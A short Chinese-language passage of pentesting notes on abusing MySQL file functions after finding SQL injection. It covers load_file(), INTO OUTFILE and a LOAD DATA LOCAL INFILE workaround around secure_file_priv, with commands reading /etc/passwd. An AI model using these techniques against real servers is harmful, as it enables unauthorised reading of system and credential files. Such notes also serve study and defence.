参考:
https://blog.csdn.net/slip_666/article/details/79050454
1.通过load_file()函数将文件内容爆出来
前提条件
- 当前权限对该文件可读
- 文件在该服务器上
- 路径完整
- 文件大小小于max_allowed_packet
- 当前数据库用户有FILE权限
- secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作
2. 通过SELECT…INTO OUTFILE写文件
前提条件
- 目标目录要有可写权限
- 当前数据库用户要有FILE权限
- 目标文件不能已存在
- secure_file_priv的值为空
- 路径完整
找到sql注入的时候,想要读文件,发现
mysql> select load_file("/etc/passwd") into outfile "/tmp/passwd";
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
查看该值:
mysql> SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
workarounds
于是可以新建一个表,或者直接把要读文件的内容into到已有的字符类型的表中。
参考:https://stackoverflow.com/a/40630313
http://www.runoob.com/mysql/mysql-create-tables.html
mysql> create table mytable(a VARCHAR(100), b VARCHAR(100), c VARCHAR(100), d VARCHAR(100), e VARCHAR(100), f VARCHAR(100), g VARCHAR(100));
Query OK, 0 rows affected (0.04 sec)
mysql> LOAD DATA LOCAL INFILE "/etc/passwd" INTO TABLE mytable;
Query OK, 33 rows affected, 198 warnings (0.01 sec)
Records: 33 Deleted: 0 Skipped: 0 Warnings: 198
mysql> select * from mytable;
但是也有版本不支持: